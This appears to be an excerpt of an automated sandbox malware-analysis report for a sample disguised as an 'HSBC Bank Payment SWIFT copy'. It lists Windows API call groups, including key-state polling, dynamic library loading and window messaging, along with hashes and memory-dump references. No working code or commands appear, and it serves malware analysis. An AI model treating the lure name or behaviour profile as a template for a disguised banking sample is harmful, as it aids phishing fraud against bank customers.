                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3440857362-0
                                                                                                                                • Opcode ID: 16027cf62125f855dbf2a93cac3a125ff2061c37f905e0db4a2a6da21ae103e4
                                                                                                                                • Instruction ID: 09fe89e7ff6da8bb56ec8daf56aebf57dbae24537ee15b961b805ddd2980ddf4
                                                                                                                                • Opcode Fuzzy Hash: 16027cf62125f855dbf2a93cac3a125ff2061c37f905e0db4a2a6da21ae103e4
                                                                                                                                • Instruction Fuzzy Hash: 5A516C71208204EFD704EF64D885EAEB7E9FF85304F44892DF59587291DB39E944CB92
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0079D927
                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0079D9AA
                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0079D9C6
                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0079DA07
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0079DA21
                                                                                                                                  • Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00787896,?,?,00000000), ref: 00725A2C
                                                                                                                                  • Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00787896,?,?,00000000,?,?), ref: 00725A50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 327935632-0
                                                                                                                                • Opcode ID: 2a84676e246ce94165793f610d40901340f6351976a80cb97cde721017638552
                                                                                                                                • Instruction ID: 6181bc638834a1d81d8a2cc02c3b3977611d63ecb5e7664687bd141d754cc292
                                                                                                                                • Opcode Fuzzy Hash: 2a84676e246ce94165793f610d40901340f6351976a80cb97cde721017638552
                                                                                                                                • Instruction Fuzzy Hash: B9512675A00619DFCB10EFA8E4889ADB7B5FF19320B04C065E959AB312DB38AD45CF90
                                                                                                                                APIs
                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0078E61F
                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0078E648
                                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0078E687
                                                                                                                                  • Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
                                                                                                                                  • Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC
                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0078E6AC
                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0078E6B4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1389676194-0
                                                                                                                                • Opcode ID: 6105ac9e9159153dcc96dbcde4026d9d462b6608c77833279ac691cf43f3e4a9
                                                                                                                                • Instruction ID: 330937d39ae028aa20254e9eb8aee83e44b02117035aa108a37861df08eab5a4
                                                                                                                                • Opcode Fuzzy Hash: 6105ac9e9159153dcc96dbcde4026d9d462b6608c77833279ac691cf43f3e4a9
                                                                                                                                • Instruction Fuzzy Hash: 9A513935A00215DFCB00EF64D985AADBBF5EF49310F1880A9E909AB361DB39ED10CB54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 383e07c7a5fc45f63e9065f4a6284413097f25063f041f985fdbd10d64d5e322
                                                                                                                                • Instruction ID: b7eb72828f266b2d46b4d39ef00d4e0f7cbee6de33ef2e3b77ecf828f9d8c150
                                                                                                                                • Opcode Fuzzy Hash: 383e07c7a5fc45f63e9065f4a6284413097f25063f041f985fdbd10d64d5e322
                                                                                                                                • Instruction Fuzzy Hash: 5D419035905148BFD720DB68CC88FAABBB5EB8A310F144365F816A72E1D738AD41DB51
                                                                                                                                APIs
                                                                                                                                • GetCursorPos.USER32(?), ref: 00722357
                                                                                                                                • ScreenToClient.USER32(007E57B0,?), ref: 00722374
                                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 00722399
                                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 007223A7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4210589936-0
                                                                                                                                • Opcode ID: 4e59e948ea394488e33c71aad1dd5c6f5ffb06e946268904c6405ef95423cb7f
                                                                                                                                • Instruction ID: 0d39107b67fa8223668e5064557727969464924b903be47133284776677609f7
                                                                                                                                • Opcode Fuzzy Hash: 4e59e948ea394488e33c71aad1dd5c6f5ffb06e946268904c6405ef95423cb7f
                                                                                                                                • Instruction Fuzzy Hash: 69418E35604219FFDF15DF68CC48AE9BBB4FB05361F20431AF828A22E2C7789954DB91
                                                                                                                                APIs
                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007763E7
                                                                                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00776433
                                                                                                                                • TranslateMessage.USER32(?), ref: 0077645C
                                                                                                                                • DispatchMessageW.USER32(?), ref: 00776466
                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00776475
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2108273632-0
                                                                                                                                • Opcode ID: 471af4153fe5205a746e84c48931faa98ec4e149defac5d4e293ab8400964edd
                                                                                                                                • Instruction ID: dddd0287bda6888a19e8f2a8ba3a412ed9dad68c6b960417fe2cfd3d525c5a0b
                                                                                                                                • Opcode Fuzzy Hash: 471af4153fe5205a746e84c48931faa98ec4e149defac5d4e293ab8400964edd
                                                                                                                                • Instruction Fuzzy Hash: E9310571901ACAEFDF24CFB0CC84BB67BACAB05384F14C165E529CA0A4E73D9944DB60
                                                                                                                                APIs
                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00778A30
                                                                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 00778ADA
                                                                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00778AE2
                                                                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 00778AF0
                                                                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00778AF8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3382505437-0
                                                                                                                                • Opcode ID: bf8de98d3930645bab73571d82e79bc4278be28cdddeec1e056b69a899cec1a9
                                                                                                                                • Instruction ID: c55f28df355bf6a85613e20f7d8ce374b5aab700f2350b1035442a72164adbc2
                                                                                                                                • Opcode Fuzzy Hash: bf8de98d3930645bab73571d82e79bc4278be28cdddeec1e056b69a899cec1a9
                                                                                                                                • Instruction Fuzzy Hash: FF31E071500219EBDF14CFA8DD4CA9E3BB5EB45315F11C22AF928EA2D0C7B89910CB91
                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 0077B204
                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0077B221
                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0077B259
                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0077B27F
                                                                                                                                • _wcsstr.LIBCMT ref: 0077B289
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3902887630-0
                                                                                                                                • Opcode ID: c377abfa810cabb5a45beb3739e868dc9e884bfb8cc3a92d4bd8ad7924dcabd1
                                                                                                                                • Instruction ID: 7d4d6d605a1603b165077b921689deb817d21f4dbf770cdf267bf29f4b6a4543
                                                                                                                                • Opcode Fuzzy Hash: c377abfa810cabb5a45beb3739e868dc9e884bfb8cc3a92d4bd8ad7924dcabd1
                                                                                                                                • Instruction Fuzzy Hash: 9221F571605204BAEF155B759C09F7F7B98EF8A7A0F00C13DF908DA162EF799C4096A0
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007AB192
                                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007AB1B7
                                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007AB1CF
                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 007AB1F8
                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00790E90,00000000), ref: 007AB216
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2294984445-0
                                                                                                                                • Opcode ID: 8525cee74c56b0e537df2f5695cc47c39af564e4811d3ccb0b46917046cfec81
                                                                                                                                • Instruction ID: 4141f05d845fc145c2edc2d536b0a893534dc8fb82356863aeac8171eea95b82
                                                                                                                                • Opcode Fuzzy Hash: 8525cee74c56b0e537df2f5695cc47c39af564e4811d3ccb0b46917046cfec81
                                                                                                                                • Instruction Fuzzy Hash: FD218071A11665AFCB109F78DC54B6A37A4FB8A321F108739F922D71E1E7389C609B90
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00779320
                                                                                                                                  • Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06
                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00779352
                                                                                                                                • __itow.LIBCMT ref: 0077936A
                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00779392
                                                                                                                                • __itow.LIBCMT ref: 007793A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$__itow$_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2983881199-0
                                                                                                                                • Opcode ID: d6f25b8e6d3e87df3349a2978afd191c1ecc4732eda4fc3f2c33aa3e007b7034
                                                                                                                                • Instruction ID: 1a85cc57ef1b384f1a60bb015cb2c3eecce355d6164850f24b4887b18dd7af78
                                                                                                                                • Opcode Fuzzy Hash: d6f25b8e6d3e87df3349a2978afd191c1ecc4732eda4fc3f2c33aa3e007b7034
                                                                                                                                • Instruction Fuzzy Hash: 4521D731702218EBDF109EA49C89EEE7BADEB89751F048025FE09D71D1D6B8CD51C7A1
                                                                                                                                APIs
                                                                                                                                • IsWindow.USER32(00000000), ref: 00795A6E
                                                                                                                                • GetForegroundWindow.USER32 ref: 00795A85
                                                                                                                                • GetDC.USER32(00000000), ref: 00795AC1
                                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00795ACD
                                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00795B08
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4156661090-0
                                                                                                                                • Opcode ID: c3e0fd5b1120e4851ecf9ec3cf2a49b4c514328f1e903e966280e39f869a8f13
                                                                                                                                • Instruction ID: 11d7a2a2e818e4a2b20ec0505d3f9f5c0c9e3f9d1055e3402eb75193daf36e65
                                                                                                                                • Opcode Fuzzy Hash: c3e0fd5b1120e4851ecf9ec3cf2a49b4c514328f1e903e966280e39f869a8f13
                                                                                                                                • Instruction Fuzzy Hash: DE218075A00114EFDB14EFA4DC88A5ABBF5EF89310F14C079E949D7352CA38AC00CB54
                                                                                                                                APIs
                                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0072134D
                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0072135C
                                                                                                                                • BeginPath.GDI32(?), ref: 00721373
                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0072139C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3225163088-0
                                                                                                                                • Opcode ID: b45b985aa1ead43770876ffafa9ee94e54fdcfd1b6fc78015f78345b809bc16e
                                                                                                                                • Instruction ID: 8a45ab6325c44a8cb77014666c60bce93c87ac41313a2277b5a1e528deb1b0e8
                                                                                                                                • Opcode Fuzzy Hash: b45b985aa1ead43770876ffafa9ee94e54fdcfd1b6fc78015f78345b809bc16e
                                                                                                                                • Instruction Fuzzy Hash: 50216D3080165CEFDB10CF65EC8476A7BA9FB14325F548226F8109A5B1D3BD9891DF98
                                                                                                                                APIs
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00784ABA
                                                                                                                                • __beginthreadex.LIBCMT ref: 00784AD8
                                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00784AED
                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00784B03
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00784B0A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3824534824-0
                                                                                                                                • Opcode ID: e1ba3418a4ec3a661c2bb8ca24e1304c1ceef42cd5edead9640f266d194fbb92
                                                                                                                                • Instruction ID: a5210f0951c7bc283edd7d1e6ec0792d72a86bff0e1ba99822e392798018d4c5
                                                                                                                                • Opcode Fuzzy Hash: e1ba3418a4ec3a661c2bb8ca24e1304c1ceef42cd5edead9640f266d194fbb92
                                                                                                                                • Instruction Fuzzy Hash: FC112BB6905259BFCB009FA8DC48A9B7FACFB89324F148269F914D7250D7BDCD0087A5
                                                                                                                                APIs
                                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0077821E
                                                                                                                                • GetLastError.KERNEL32(?,00777CE2,?,?,?), ref: 00778228
                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00777CE2,?,?,?), ref: 00778237
                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00777CE2,?,?,?), ref: 0077823E
                                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00778255
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 842720411-0
                                                                                                                                • Opcode ID: 6d61c38ebe6f51170541f5ef83fd911e4c0999bcc4638ebb5b59798185e32da9
                                                                                                                                • Instruction ID: d78e60eca59dc5f6e2086b576fcb02086ba5a1c83b8acb8d7fb697758b729c23
                                                                                                                                • Opcode Fuzzy Hash: 6d61c38ebe6f51170541f5ef83fd911e4c0999bcc4638ebb5b59798185e32da9
                                                                                                                                • Instruction Fuzzy Hash: B5016971380208BFDF204FA6DC4CD6B7BACFF8A796B508569F809C2220DA358C00CA61
                                                                                                                                APIs
                                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?,?,00777455), ref: 00777127
                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?), ref: 00777142
                                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?), ref: 00777150
                                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?), ref: 00777160
                                                                                                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?), ref: 0077716C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3897988419-0
                                                                                                                                • Opcode ID: 511cf77429d5e06ffdfe38bbed13de9f9fd820f46798c03d723425e97a5671f1
                                                                                                                                • Instruction ID: f43ec4d84ff9f144acd7dabe0c734002e59a2cbe7a0653f17e93af1a119c42ab
